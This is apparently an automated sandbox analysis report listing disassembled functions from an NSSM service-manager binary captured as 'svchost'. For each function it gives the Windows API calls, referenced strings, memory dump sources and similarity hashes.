API ID: __snwprintf_s$CreateErrorLastOpen__vsnwprintf_s_l
String ID: NSSM_REGISTRY$SYSTEM\CurrentControlSet\Services\%s\Parameters$SYSTEM\CurrentControlSet\Services\%s\Parameters\%s$open_registry()
API String ID: 3162672713-2180615361
Opcode ID: 694e5b5481d173b3ab35a74997d032020c8674ed162b4220796c0d16fe997546
Instruction ID: 51ad032d09eab74b91555c8713cdb19e4fcc5e6d9908cd399ce7877185dd2446
Opcode Fuzzy Hash: 694e5b5481d173b3ab35a74997d032020c8674ed162b4220796c0d16fe997546
Instruction Fuzzy Hash: 3221E6F0A443016FE220F760CD47FBB3398EB54704F90452E7659E61C2FAB8954086AA

Function 00405370 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserDefaultLangID.KERNEL32(00401059,0000FFFF,00000000,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 0040537F
FormatMessageW.KERNELBASE(00000B00,00000000,0040547B,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 0040539B
FormatMessageW.KERNEL32(00000B00,00000000,0040547B,00000000,00401059,0000FFFF,00000000,?,?,?,?,0040547B,40000206,?,00401059,-00000040), ref: 004053B4
GetProcessHeap.KERNEL32(00000000,00000040,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 004053BD
HeapAlloc.KERNEL32(00000000,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 004053C4
__snwprintf_s.LIBCMT ref: 004053DC

Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748

Strings

system error %lu, xrefs: 004053CB

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: FormatHeapMessage$AllocDefaultLangProcessUser__snwprintf_s__vsnwprintf_s_l
String ID: system error %lu
API String ID: 3208699588-1824642319
Opcode ID: af2739f03ea27dcb77735334c53fbd1a84ab6c27a147f2b738a7d16c807b2f59
Instruction ID: accda3c8b7d2623306d44ba6687032fe0a4120849f219a87f72b30063895a064
Opcode Fuzzy Hash: af2739f03ea27dcb77735334c53fbd1a84ab6c27a147f2b738a7d16c807b2f59
Instruction Fuzzy Hash: 5A01A7F16043127BE610A7659C09FBB7B9CDF807A1F10453AFA10D61C0E7B4D4059A78

Function 00401A00 Relevance: 6.0, APIs: 4, Instructions: 16
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleWindow.KERNELBASE ref: 00401A01
GetWindowThreadProcessId.USER32(00000000), ref: 00401A10
GetCurrentProcessId.KERNEL32 ref: 00401A1A
FreeConsole.KERNEL32 ref: 00401A25

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: ConsoleProcessWindow$CurrentFreeThread
String ID:
API String ID: 3525601419-0
Opcode ID: 5629e28a465c767bbbe1bbf1bc2c58c11f9f367261ce32223375feb305a5a444
Instruction ID: 2f1dd8984dbdf2ce013bee9d2ff09af7205948615cb30f205b3daea2ec8f1f74
Opcode Fuzzy Hash: 5629e28a465c767bbbe1bbf1bc2c58c11f9f367261ce32223375feb305a5a444
Instruction Fuzzy Hash: 13D09EB0B211019BD7147B75DD4C59A77B8EE44312750C579E852D11A0DB78D440CE39

Function 0040CA70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenSCManagerW.ADVAPI32(00000000,ServicesActive,?,00401B82,?,?,?,00000001), ref: 0040CA7C

Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460

Strings

ServicesActive, xrefs: 0040CA75

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Event$Source$DeregisterManagerOpenRegisterReport
String ID: ServicesActive
API String ID: 2921005559-3071072050
Opcode ID: e973317576628494c7e2fe419008a8c2cfe1cd689f8f975b8f69e46efd21db25
Instruction ID: d605054c54634b75e85081cc8a0520dc7152891e0ecd9d3c37b7bd7883cdffd9
Opcode Fuzzy Hash: e973317576628494c7e2fe419008a8c2cfe1cd689f8f975b8f69e46efd21db25
Instruction Fuzzy Hash: F7D0A7B07003007AE310EB605D46F672658970074AF408436B509E11C3D1698841461A

Function 0040AE90 Relevance: 3.0, APIs: 2, Instructions: 43
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegSetValueExW.KERNELBASE(0040B737,00000000,00000000,00000001,00000000,?,00000000,0040AF26,?,?,00000000,00000001,0040B737,00000000,Application,?), ref: 0040AECC
GetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040AEDA

Part of subcall function 004052C0: TlsGetValue.KERNEL32(00000000,?,00401042,00000000,00000000), ref: 004052C7
Part of subcall function 004052C0: LocalAlloc.KERNEL32(00000040,0000FFFF,?,00401042,00000000,00000000), ref: 004052DA

Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Event$SourceValue$AllocDeregisterErrorLastLocalRegisterReport
String ID:
API String ID: 2655982260-0
Opcode ID: 9e4b115cd924ec1184744bcb023a8fc9515248580838a4aa222a32ded7d0333a
Instruction ID: 0ff3c643925308dee1897a7934ae175a7d9a08f2eac1449aa01b77ecff095460
Opcode Fuzzy Hash: 9e4b115cd924ec1184744bcb023a8fc9515248580838a4aa222a32ded7d0333a
Instruction Fuzzy Hash: E2F0C2B15042026FEB049B14EC4AFE777ACDF84758F06C469F849DB282E674EE4586A2

Function 00405470 Relevance: 3.0, APIs: 2, Instructions: 19
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405370: GetUserDefaultLangID.KERNEL32(00401059,0000FFFF,00000000,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 0040537F
Part of subcall function 00405370: FormatMessageW.KERNELBASE(00000B00,00000000,0040547B,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 0040539B
Part of subcall function 00405370: FormatMessageW.KERNEL32(00000B00,00000000,0040547B,00000000,00401059,0000FFFF,00000000,?,?,?,?,0040547B,40000206,?,00401059,-00000040), ref: 004053B4
Part of subcall function 00405370: GetProcessHeap.KERNEL32(00000000,00000040,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 004053BD
Part of subcall function 00405370: HeapAlloc.KERNEL32(00000000,?,?,?,?,0040547B,40000206,?,00401059,-00000040,40000206,00000000,00000000), ref: 004053C4
Part of subcall function 00405370: __snwprintf_s.LIBCMT ref: 004053DC

_vfwprintf.LIBCMT ref: 0040548F

Part of subcall function 00412E2D: _vfwprintf_helper.LIBCMT ref: 00412E42

LocalFree.KERNELBASE(00000000,?,?,?,00000000,00000000), ref: 00405498

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: FormatHeapMessage$AllocDefaultFreeLangLocalProcessUser__snwprintf_s_vfwprintf_vfwprintf_helper
String ID:
API String ID: 1306074386-0
Opcode ID: e9892c6baceeda6f9f61b86e8acf41dfdb428b9bd39c5d7411bf38cb53dd31e2
Instruction ID: 2592380da1669d33218ee91daf38bafb7c1dab6b6b9683df9bfa30739b65c589
Opcode Fuzzy Hash: e9892c6baceeda6f9f61b86e8acf41dfdb428b9bd39c5d7411bf38cb53dd31e2
Instruction Fuzzy Hash: 73D02BB1C0122277C120E710EC09CDF3B98DE40394F04482CF80552110D23CDC858BD6

Function 004136FD Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___crtCorExitProcess.LIBCMT ref: 00413705

Part of subcall function 004136D2: GetModuleHandleW.KERNEL32(mscoree.dll,?,0041370A,?,?,00418C5A,000000FF,0000001E,?,004140C2,?,00000001,?,?,00414556,00000018), ref: 004136DC
Part of subcall function 004136D2: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004136EC

ExitProcess.KERNEL32 ref: 0041370E

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 6cf1626b48435327ff5cf8a7c1fce1047595b6b51481a4f821607c6479e48e72
Instruction ID: c773c40137fd1d48a63a92fcfe9ea896ee907ee475da7e957b21ec7d4b05a1b8
Opcode Fuzzy Hash: 6cf1626b48435327ff5cf8a7c1fce1047595b6b51481a4f821607c6479e48e72
Instruction Fuzzy Hash: 9AB09271000108BBCF212F26DC0A8893F2AEB803A1B108025F81809131DF76EEA29A8C

Function 00418B0C Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00418B21

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: d1f5c1f7ff6ca3e210c9ff08d4e84c7b89227a1fab85292e36c71b5e85367a71
Instruction ID: 6fb3f13a5da9b15824ab22e1f0bcca622450086d227712405257e67a9503346b
Opcode Fuzzy Hash: d1f5c1f7ff6ca3e210c9ff08d4e84c7b89227a1fab85292e36c71b5e85367a71
Instruction Fuzzy Hash: 09D05E72B94304AADB109F75BD08B623BECD784396F00843AB90CC6150E678DA81DA08

Function 00413919 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_doexit.LIBCMT ref: 00413925

Part of subcall function 004137ED: __lock.LIBCMT ref: 004137FB
Part of subcall function 004137ED: __decode_pointer.LIBCMT ref: 00413832
Part of subcall function 004137ED: __decode_pointer.LIBCMT ref: 00413847
Part of subcall function 004137ED: __decode_pointer.LIBCMT ref: 00413871
Part of subcall function 004137ED: __decode_pointer.LIBCMT ref: 00413887
Part of subcall function 004137ED: __decode_pointer.LIBCMT ref: 00413894
Part of subcall function 004137ED: __initterm.LIBCMT ref: 004138C3
Part of subcall function 004137ED: __initterm.LIBCMT ref: 004138D3

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: cd6012783e630caf1846ed7f46355f70d13e96bf156bd8dd16ed885f7af1e038
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: ABB012B268030C37EA202947EC03F467F4D87C0B64F244071FA1C1D1E1A9A3BAA180CD

Non-executed Functions

Function 0040CAB0 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 203memoryserviceCOMMON

Download Yara Rule

APIs

OpenServiceW.ADVAPI32(?,?,?,?,00000000,00000000,77735E70), ref: 0040CAEF
GetServiceDisplayNameW.ADVAPI32 ref: 0040CB17
GetServiceKeyNameW.ADVAPI32(?,?,?,?), ref: 0040CB34
GetLastError.KERNEL32 ref: 0040CB47
GetLastError.KERNEL32 ref: 0040CB50
EnumServicesStatusW.ADVAPI32 ref: 0040CB9D
GetLastError.KERNEL32 ref: 0040CBA3
GetProcessHeap.KERNEL32(00000000,0000003B), ref: 0040CBB7
HeapAlloc.KERNEL32(00000000), ref: 0040CBBE
EnumServicesStatusW.ADVAPI32(?,0000003B,00000003,00000000,00000003,?,0000003B,?), ref: 0040CC1A
GetLastError.KERNEL32 ref: 0040CC2A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040CC75
HeapFree.KERNEL32(00000000), ref: 0040CC7C
GetLastError.KERNEL32 ref: 0040CC82
__snwprintf_s.LIBCMT ref: 0040CCB4
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?), ref: 0040CCC3
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 0040CCCA
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?), ref: 0040CCDF
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 0040CCE6

Strings

canonical_name, xrefs: 0040CCD5
open_service(), xrefs: 0040CBCA, 0040CCD0
ENUM_SERVICE_STATUS, xrefs: 0040CBCF

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Heap$ErrorLast$Process$FreeService$EnumNameServicesStatus$AllocDisplayOpen__snwprintf_s
String ID: ENUM_SERVICE_STATUS$canonical_name$open_service()
API String ID: 2597093351-3687008758
Opcode ID: a873ba07c5b4005c15c99fbe001417df42881820b5864b2ce8b4ed45134739af
Instruction ID: f503188999ee140625c6406a49f341195e14fe3366045b110030180a16826972
Opcode Fuzzy Hash: a873ba07c5b4005c15c99fbe001417df42881820b5864b2ce8b4ed45134739af
Instruction Fuzzy Hash: 51618AB1904301EBD710DB55DC85FAFB7E8EBD8704F104A2EF959A3280D778E9058B6A

Function 0040A1E0 Relevance: 18.1, APIs: 12, Instructions: 125processthreadCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0040A1EA
GetLastError.KERNEL32(00000000), ref: 0040A1F6

Part of subcall function 004052C0: TlsGetValue.KERNEL32(00000000,?,00401042,00000000,00000000), ref: 004052C7
Part of subcall function 004052C0: LocalAlloc.KERNEL32(00000040,0000FFFF,?,00401042,00000000,00000000), ref: 004052DA

Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460

Thread32First.KERNEL32 ref: 0040A24E
GetLastError.KERNEL32(00000000), ref: 0040A258
CloseHandle.KERNEL32(00000000), ref: 0040A27D

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Event$ErrorLastSource$AllocCloseCreateDeregisterFirstHandleLocalRegisterReportSnapshotThread32Toolhelp32Value
String ID:
API String ID: 414364297-0
Opcode ID: 4638767dc103a9e6a31185ccdf1f383c447c27e4fd120cc99bc6f3ea7aaed1db
Instruction ID: 89f48a4cf6a9a6b2169b356681f18064eeb06023b63748c5040493b97caa791b
Opcode Fuzzy Hash: 4638767dc103a9e6a31185ccdf1f383c447c27e4fd120cc99bc6f3ea7aaed1db
Instruction Fuzzy Hash: 9131B6B1504300AFD300EF659D45FAB77E8EF84318F84487EF549E3282E634E9158BAA

Function 0040FA10 Relevance: 10.6, APIs: 7, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90058403c9df6f6ed3b87d35343112d852bc14fd61586e00f88080c2bcc3e524
Instruction ID: f9580fb1e3cb4435e98f8377f0ae24c04a26ce3602f05662924e3990e25ac85f
Opcode Fuzzy Hash: 90058403c9df6f6ed3b87d35343112d852bc14fd61586e00f88080c2bcc3e524
Instruction Fuzzy Hash: 6F21F7F2A406087BE6207765BC4AFDB375CDB88319F00403AF609E5182E779E8454A68

Function 00405600 Relevance: 9.0, APIs: 6, Instructions: 40COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32 ref: 00405601
FindResourceExW.KERNEL32(00000000,00000005,?,?), ref: 00405616
GetLastError.KERNEL32(?,?), ref: 0040561C
FindResourceExW.KERNEL32(00000000,00000005,?,00000000,?,?), ref: 00405634
LoadResource.KERNEL32(00000000,00000000,?,?), ref: 0040563D
CreateDialogIndirectParamW.USER32(00000000,00000000,?,?,?), ref: 00405659

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Resource$Find$CreateDefaultDialogErrorIndirectLangLastLoadParamUser
String ID:
API String ID: 940021595-0
Opcode ID: 72ef7efeecf6b696462b6b58e3e31324a3b31a326ada6146fcfc12930be8b8d8
Instruction ID: e476e4ad9c0365e054dca9b840df72f2dc216dd3d76c2c72e3c00f538e0b4bad
Opcode Fuzzy Hash: 72ef7efeecf6b696462b6b58e3e31324a3b31a326ada6146fcfc12930be8b8d8
Instruction Fuzzy Hash: 24F09AB0708600BAE2505B64BC09FBB2768DBC4B12F408525F958D61C0EA78D8018E79

Function 00412CDC Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00416877
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041688C
UnhandledExceptionFilter.KERNEL32(0041F0D8), ref: 00416897
GetCurrentProcess.KERNEL32(C0000409), ref: 004168B3
TerminateProcess.KERNEL32(00000000), ref: 004168BA

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: f01314061c3818e20305920116d866878eb5042cc5ccecfbecbbfc2216c79b6f
Instruction ID: 714c231b98a53905c4c0fced0f636a606c023e921e8ea544abea05735bda33fc
Opcode Fuzzy Hash: f01314061c3818e20305920116d866878eb5042cc5ccecfbecbbfc2216c79b6f
Instruction Fuzzy Hash: B921C5F5A01304AFCB31DF54E9456847BB8FB98302F90817AE51987360E7B89A868F4D

Function 0040CE10 Relevance: 80.9, APIs: 39, Strings: 7, Instructions: 394memoryregistryserviceCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Control\ServiceGroupOrder,00000000,00020019,?), ref: 0040CEED
GetLastError.KERNEL32 ref: 0040CEF7
_fwprintf.LIBCMT ref: 0040CF1A

Part of subcall function 00405470: _vfwprintf.LIBCMT ref: 0040548F
Part of subcall function 00405470: LocalFree.KERNELBASE(00000000,?,?,?,00000000,00000000), ref: 00405498

ChangeServiceConfigW.ADVAPI32(?,000000FF,000000FF,000000FF,00000000,00000000,00000000,0041E5D8,00000000,00000000,00000000,00000000,?,00000000,?), ref: 0040D225
GetProcessHeap.KERNEL32(00000000,0041E5D8), ref: 0040D239
HeapFree.KERNEL32(00000000), ref: 0040D240
GetLastError.KERNEL32 ref: 0040D246
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040D27A
HeapFree.KERNEL32(00000000), ref: 0040D283
GetProcessHeap.KERNEL32(00000000,?), ref: 0040D290
HeapFree.KERNEL32(00000000), ref: 0040D293
CloseServiceHandle.ADVAPI32(?), ref: 0040D29A
_fwprintf.LIBCMT ref: 0040D2BD

Part of subcall function 0040CA70: OpenSCManagerW.ADVAPI32(00000000,ServicesActive,?,00401B82,?,?,?,00000001), ref: 0040CA7C

Strings

%s\%s: %s, xrefs: 0040CFD0, 0040D02A
SYSTEM\CurrentControlSet\Control\ServiceGroupOrder, xrefs: 0040CEE3, 0040CF07, 0040CFCB, 0040D025
List, xrefs: 0040CF44, 0040CFA6, 0040CFC6, 0040D020
set_service_dependencies(), xrefs: 0040CF6D
groups, xrefs: 0040CF72
%s: %s, xrefs: 0040CF0C
%s: %s, xrefs: 0040D108, 0040D2AF

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Heap$Free$Process$ErrorLastOpenService_fwprintf$ChangeCloseConfigHandleLocalManager_vfwprintf
String ID: %s: %s$%s: %s$%s\%s: %s$List$SYSTEM\CurrentControlSet\Control\ServiceGroupOrder$groups$set_service_dependencies()
API String ID: 1051873479-3133791794
Opcode ID: 1472673ddb642fb760451205b66f8a7f14b720a8d27ed31555cebdbe2feeab61
Instruction ID: 9c0a7fc0b1366e98588ba43337f49fd2028f4eb401c9540c82854c5db0497d9e
Opcode Fuzzy Hash: 1472673ddb642fb760451205b66f8a7f14b720a8d27ed31555cebdbe2feeab61
Instruction Fuzzy Hash: 41C1D8F1D04301ABD710ABA1DC4AFAB77A8EF44708F14452AF945A72C1F778E94487AE

Function 00409270 Relevance: 72.2, APIs: 33, Strings: 8, Instructions: 427fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000001,?,00000000,?,?,00000000), ref: 004092B5
GetLastError.KERNEL32(00000000), ref: 004092C3

Strings

STD_OUTPUT_HANDLE, xrefs: 00409727
stdin, xrefs: 004096CD
stdout, xrefs: 00409435, 00409722
STD_ERROR_HANDLE, xrefs: 0040977C
AppStderr, xrefs: 0040964D
AppStdout, xrefs: 0040943A, 004094F8
stderr, xrefs: 004094F3, 00409648, 00409777
STD_INPUT_HANDLE, xrefs: 004096D2

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: CreateErrorFileLast
